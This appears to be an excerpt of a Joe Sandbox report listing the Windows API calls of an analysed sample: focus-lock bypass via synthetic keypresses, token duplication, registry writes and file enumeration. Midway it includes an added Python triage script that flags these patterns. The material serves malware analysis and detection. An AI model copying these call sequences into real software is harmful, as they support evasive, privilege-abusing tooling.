                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1452528299-0
                                                                        • Opcode ID: 841f02896ab1f72f4e9fbde57a0fcb659d17788f00486b9642152e94911edc7b
                                                                        • Instruction ID: 13b345086c9b69cade90e308976dd039a760cbbe805c5b1fa467acde2233e0e8
                                                                        • Opcode Fuzzy Hash: 841f02896ab1f72f4e9fbde57a0fcb659d17788f00486b9642152e94911edc7b
                                                                        • Instruction Fuzzy Hash: 817162302047058FDB05EF68D491A6AB7E1FF99314F08492DFA96DB3A1DB30E945CB92
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 01500CC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction ID: 0e13251a0390b9d790109f49a6c0edde440c19b6dc35d180a9d36cfddb90534e
                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction Fuzzy Hash: D4E09A7498020DAFDB00DFA4D64969D7BB4FF04301F1005A1FD0596680DA309A548A62
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 01500CC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction ID: bd202e9e20fe030415a0243fa70cc93f29f193f8cd127297fff360f1da20b6fb
                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction Fuzzy Hash: 45E0E67498020DDFDB00DFF4D64969D7BB4FF04301F100161FD01D2280D6309D508A62
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?), ref: 0091CB37
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0091CB95
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0091CBD6
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0091CC00
                                                                        • SendMessageW.USER32 ref: 0091CC29
                                                                        • _wcsncpy.LIBCMT ref: 0091CC95
                                                                        • GetKeyState.USER32(00000011), ref: 0091CCB6
                                                                        • GetKeyState.USER32(00000009), ref: 0091CCC3
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0091CCD9
                                                                        • GetKeyState.USER32(00000010), ref: 0091CCE3
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0091CD0C
                                                                        • SendMessageW.USER32 ref: 0091CD33
                                                                        • SendMessageW.USER32(?,00001030,?,0091B348), ref: 0091CE37
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?), ref: 0091CE4D
                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0091CE60
                                                                        • SetCapture.USER32(?), ref: 0091CE69
                                                                        • ClientToScreen.USER32(?,?), ref: 0091CECE
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0091CEDB
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 0091CEF5
                                                                        • ReleaseCapture.USER32 ref: 0091CF00
                                                                        • GetCursorPos.USER32(?), ref: 0091CF3A
                                                                        • ScreenToClient.USER32(?,?), ref: 0091CF47
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0091CFA3
                                                                        • SendMessageW.USER32 ref: 0091CFD1
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0091D00E
                                                                        • SendMessageW.USER32 ref: 0091D03D
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0091D05E
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0091D06D
                                                                        • GetCursorPos.USER32(?), ref: 0091D08D
                                                                        • ScreenToClient.USER32(?,?), ref: 0091D09A
                                                                        • GetParent.USER32(?), ref: 0091D0BA
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0091D123
                                                                        • SendMessageW.USER32 ref: 0091D154
                                                                        • ClientToScreen.USER32(?,?), ref: 0091D1B2
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0091D1E2
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0091D20C
                                                                        • SendMessageW.USER32 ref: 0091D22F
                                                                        • ClientToScreen.USER32(?,?), ref: 0091D281
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0091D2B5
                                                                          • Part of subcall function 008925DB: GetWindowLongW.USER32(?,000000EB), ref: 008925EC
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0091D351
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 3977979337-4164748364
                                                                        • Opcode ID: 95e5eccd1f69246220e4dc33c8ceb25ce8a709ee4521b7934517114cdc356ac3
                                                                        • Instruction ID: 975e064826741510acd0d440f3056d60e37627df6b063f955c977382daa66fe8
                                                                        • Opcode Fuzzy Hash: 95e5eccd1f69246220e4dc33c8ceb25ce8a709ee4521b7934517114cdc356ac3
                                                                        • Instruction Fuzzy Hash: 1342AE74348349AFDB20CF29D854AAABBE9FF49310F144919F595C72A1C731E890EB52
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_memset
                                                                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                        • API String ID: 1357608183-1798697756
                                                                        • Opcode ID: 38e83fc35d2dc2668c39bb4cf2bb11759dd1f8c28d2d73e54153e9863a9d74aa
                                                                        • Instruction ID: a4a3417b549732f9bae43853414f82b8a52339ba51ee1ded0e53bbeb01c1372e
                                                                        • Opcode Fuzzy Hash: 38e83fc35d2dc2668c39bb4cf2bb11759dd1f8c28d2d73e54153e9863a9d74aa
                                                                        • Instruction Fuzzy Hash: C693C071A00259DFDF24CF99C885BADB7B1FF49314F24816AE949EB281E7709E81DB40
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(00000000,?), ref: 008948DF
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008CD665
                                                                        • IsIconic.USER32(?), ref: 008CD66E
                                                                        • ShowWindow.USER32(?,00000009), ref: 008CD67B
                                                                        • SetForegroundWindow.USER32(?), ref: 008CD685
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008CD69B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 008CD6A2
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 008CD6AE
                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 008CD6BF
                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 008CD6C7
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 008CD6CF
                                                                        • SetForegroundWindow.USER32(?), ref: 008CD6D2
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD6E7
                                                                        • keybd_event.USER32(00000012,00000000), ref: 008CD6F2
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD6FC
                                                                        • keybd_event.USER32(00000012,00000000), ref: 008CD701
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD70A
                                                                        • keybd_event.USER32(00000012,00000000), ref: 008CD70F
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD719
                                                                        • keybd_event.USER32(00000012,00000000), ref: 008CD71E
                                                                        • SetForegroundWindow.USER32(?), ref: 008CD721
                                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 008CD748
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 4125248594-2988720461
                                                                        • Opcode ID: 39d5ca753044a63bce77a7c7bd9d3722c411574659ce8bfddc7480146f88ed9d
                                                                        • Instruction ID: 9910cccb410bdcf2920f02024962012824144fd54d75757c11b4bc0daf96ca8b
                                                                        • Opcode Fuzzy Hash: 39d5ca753044a63bce77a7c7bd9d3722c411574659ce8bfddc7480146f88ed9d
                                                                        • Instruction Fuzzy Hash: F9315371B5431CBAEB206F619C49FBF7E6DEB44B50F108039FA05EA1D1D6B09901FAA1
                                                                        APIs
                                                                          • Part of subcall function 008E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E882B
                                                                          • Part of subcall function 008E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E8858
                                                                          • Part of subcall function 008E87E1: GetLastError.KERNEL32 ref: 008E8865
                                                                        • _memset.LIBCMT ref: 008E8353
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008E83A5
                                                                        • CloseHandle.KERNEL32(?), ref: 008E83B6
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008E83CD
                                                                        • GetProcessWindowStation.USER32 ref: 008E83E6
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 008E83F0
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008E840A
                                                                          • Part of subcall function 008E81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 008E81E0
                                                                          • Part of subcall function 008E81CB: CloseHandle.KERNEL32(?), ref: 008E81F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                        • String ID: $default$winsta0
                                                                        • API String ID: 2063423040-1027155976
                                                                        • Opcode ID: cd0f77f2dd1b34ed522952b09dd9f05305a1b21dc58f0c5fcc42e76d7de1f0f2
                                                                        • Instruction ID: e1f0e19f5e145f1a8eccf0c76c4bd32bd1eba6e5370f44e98e7ba01070b1f3c7
                                                                        • Opcode Fuzzy Hash: cd0f77f2dd1b34ed522952b09dd9f05305a1b21dc58f0c5fcc42e76d7de1f0f2
                                                                        • Instruction Fuzzy Hash: 5381457190028DEEDF119FA5CC45AEEBBB9FF05344F148169F819E62A1DB318E14EB21
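The two function blocks above are worth reading together: the routine at refs 008CD665-008CD748 attaches its input queue to the foreground window's thread, taps ALT through keybd_event (0x12 is VK_MENU) and then calls SetForegroundWindow, which is the standard way to defeat the foreground-lock; the routine at refs 008E8353-008E840A adjusts token privileges, duplicates a token and opens winsta0 / the default desktop, the shape of a RunAs implementation. Both sequences are also what a scripting runtime such as AutoIt emits for its WinActivate and RunAs functions (the @GUI_DRAGID string elsewhere on this page is an AutoIt macro name), so on their own they point at the runtime, not at the payload. The following triage script is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses the bullet-style "APIs" lines exactly as they are rendered on this page (that format is the only assumption) and flags the call patterns just described. The rule labels are this example's own names, not Joe Sandbox signature names, and the sample input is constructed from lines copied off this page.

```python
"""Triage helper for Joe Sandbox function listings.

Added example (not part of the Joe Sandbox report or its IDA plugin): parse the
bullet-style "APIs" lines of a function block and flag call sequences that a
keylogger/stealer triage should look at twice.  Rule labels are this example's
own names, not Joe Sandbox signature names.
"""
import re
from collections import Counter

# Constructed sample: lines copied from the API listings on this page.
SAMPLE = """\
• GetForegroundWindow.USER32(00000000,?), ref: 008948DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008CD665
• AttachThreadInput.USER32(?,00000000,00000001), ref: 008CD6BF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD6E7
• keybd_event.USER32(00000012,00000000), ref: 008CD6F2
• SetForegroundWindow.USER32(?), ref: 008CD721
• AttachThreadInput.USER32(?,?,00000000), ref: 008CD748
  • Part of subcall function 008E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E882B
  • Part of subcall function 008E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E8858
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008E83A5
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008E83CD
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008E840A
• GetKeyState.USER32(00000011), ref: 0091CCB6
"""

# One listing line: optional "Part of subcall function XXXXXXXX:" prefix,
# then Api.MODULE, an optional "(arg,arg,...)" list, then "ref: XXXXXXXX".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Virtual-key codes as they appear in the listing (8 hex digits, zero padded).
VK_TAB, VK_SHIFT, VK_CONTROL, VK_MENU = "00000009", "00000010", "00000011", "00000012"


def parse_api_lines(text):
    """Return one dict per recognised listing line; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": m.group("ref"),
            "subcall": m.group("sub"),  # None when the call is made directly
        })
    return calls


def _first_arg_in(calls, api, values):
    """True if any call to `api` has one of `values` as its first argument."""
    return any(c["api"] == api and c["args"][:1] == [v] for c in calls for v in values)


def _alt_is_synthesised(calls):
    # keybd_event(VK_MENU, ...) is the ALT tap that unlocks SetForegroundWindow.
    return _first_arg_in(calls, "keybd_event", [VK_MENU])


def _modifier_state_polled(calls):
    return _first_arg_in(calls, "GetKeyState", [VK_CONTROL, VK_SHIFT, VK_TAB])


# (label, APIs that must all be present, extra argument check or None)
RULES = [
    ("foreground-lock bypass: AttachThreadInput + synthetic ALT + SetForegroundWindow",
     {"AttachThreadInput", "keybd_event", "SetForegroundWindow"}, _alt_is_synthesised),
    ("token privilege adjust + DuplicateTokenEx + winsta0/default desktop (RunAs-style)",
     {"AdjustTokenPrivileges", "DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"}, None),
    ("modifier-key polling via GetKeyState (Ctrl/Shift/Tab)",
     {"GetKeyState"}, _modifier_state_polled),
]


def match_rules(calls):
    """Labels of every rule whose API set (and argument check) is satisfied.

    Scripting runtimes such as AutoIt emit the same sequences for WinActivate
    and RunAs, so treat a hit as a pointer into the dump, not as a verdict.
    """
    present = {c["api"] for c in calls}
    return [label for label, required, check in RULES
            if required <= present and (check is None or check(calls))]


def calls_per_module(calls):
    """How many recognised calls land in each DLL / CRT module."""
    return Counter(c["module"] for c in calls)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    print(f"{len(parsed)} calls parsed; per module: {dict(calls_per_module(parsed))}")
    for hit in match_rules(parsed):
        print("flag:", hit)
```

Paste the "APIs" section of any function block in place of SAMPLE; lines that are not call bullets (the "Strings", "Memory Dump Source" and hash lines) are ignored by the parser, and a "Part of subcall function" prefix is kept in the `subcall` field so a hit can be traced back to the helper it came from.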
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 008FEFB6
                                                                        • _wcscmp.LIBCMT ref: 008FEFCB
                                                                        • _wcscmp.LIBCMT ref: 008FEFE2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 008FEFF4
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 008FF00E
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 008FF026
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF031
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 008FF04D
                                                                        • _wcscmp.LIBCMT ref: 008FF074
                                                                        • _wcscmp.LIBCMT ref: 008FF08B
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FF09D
                                                                        • SetCurrentDirectoryW.KERNEL32(00948920), ref: 008FF0BB
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 008FF0C5
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF0D2
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF0E4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1803514871-438819550
                                                                        • Opcode ID: 8b46cdfc8162e8b61bf8fd38f6a0cfd17039216efffd46c3bd619a637a01e456
                                                                        • Instruction ID: ce0c318a4154bdb16a9ab0cade42508890c58506401b8d9205ce26953e5403f8
                                                                        • Opcode Fuzzy Hash: 8b46cdfc8162e8b61bf8fd38f6a0cfd17039216efffd46c3bd619a637a01e456
                                                                        • Instruction Fuzzy Hash: DC31D43260460D6ADB14DBB4DC58AFE77ACFF84360F104175EA14D21A2DF70DA40DA51
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00910953
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0091F910,00000000,?,00000000,?,?), ref: 009109C1
                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00910A09
                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00910A92
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00910DB2
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00910DBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 536824911-966354055
                                                                        • Opcode ID: 4bf0fb2bd46a77ef026cf8df5463cb5ad4cc60742f146fb6e4da4cb4328dafe3
                                                                        • Instruction ID: 0f955f9807ab220511cd6b513d3a344201d9137701eafdde6ef7257b71f23906
                                                                        • Opcode Fuzzy Hash: 4bf0fb2bd46a77ef026cf8df5463cb5ad4cc60742f146fb6e4da4cb4328dafe3
                                                                        • Instruction Fuzzy Hash: B3025E756046059FDB14EF18C851E6AB7E9FF89314F04845CF89A9B362DB71EC81CB82
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 008FF113
                                                                        • _wcscmp.LIBCMT ref: 008FF128
                                                                        • _wcscmp.LIBCMT ref: 008FF13F
                                                                          • Part of subcall function 008F4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008F43A0
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 008FF16E
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF179
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 008FF195
                                                                        • _wcscmp.LIBCMT ref: 008FF1BC
                                                                        • _wcscmp.LIBCMT ref: 008FF1D3
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FF1E5
                                                                        • SetCurrentDirectoryW.KERNEL32(00948920), ref: 008FF203
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 008FF20D
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF21A
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF22C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 1824444939-438819550
                                                                        • Opcode ID: e94fa27545530c225c4ec75af50997ac58d438a8495f60f41facb333d28241bf
                                                                        • Instruction ID: fd985a6ee254e42d2995204ecea0a0a15ed8e7f886099abe331141ce8b8e97f3
                                                                        • Opcode Fuzzy Hash: e94fa27545530c225c4ec75af50997ac58d438a8495f60f41facb333d28241bf
                                                                        • Instruction Fuzzy Hash: AF31043660460D6ADB20AB74EC58EFE77ACFF84364F104171EA14E21A2DB30DA85CA54
                                                                        APIs
                                                                          • Part of subcall function 008E8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E821E
                                                                          • Part of subcall function 008E8202: GetLastError.KERNEL32(?,008E7CE2,?,?,?), ref: 008E8228
                                                                          • Part of subcall function 008E8202: GetProcessHeap.KERNEL32(00000008,?,?,008E7CE2,?,?,?), ref: 008E8237
                                                                          • Part of subcall function 008E8202: HeapAlloc.KERNEL32(00000000,?,008E7CE2,?,?,?), ref: 008E823E
                                                                          • Part of subcall function 008E8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E8255
                                                                          • Part of subcall function 008E829F: GetProcessHeap.KERNEL32(00000008,008E7CF8,00000000,00000000,?,008E7CF8,?), ref: 008E82AB
                                                                          • Part of subcall function 008E829F: HeapAlloc.KERNEL32(00000000,?,008E7CF8,?), ref: 008E82B2
                                                                          • Part of subcall function 008E829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008E7CF8,?), ref: 008E82C3
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008E7D13
                                                                        • _memset.LIBCMT ref: 008E7D28
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008E7D47
                                                                        • GetLengthSid.ADVAPI32(?), ref: 008E7D58
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 008E7D95
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008E7DB1
                                                                        • GetLengthSid.ADVAPI32(?), ref: 008E7DCE
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008E7DDD
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 008E7DE4
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008E7E05
                                                                        • CopySid.ADVAPI32(00000000), ref: 008E7E0C
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008E7E3D
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008E7E63
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008E7E77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
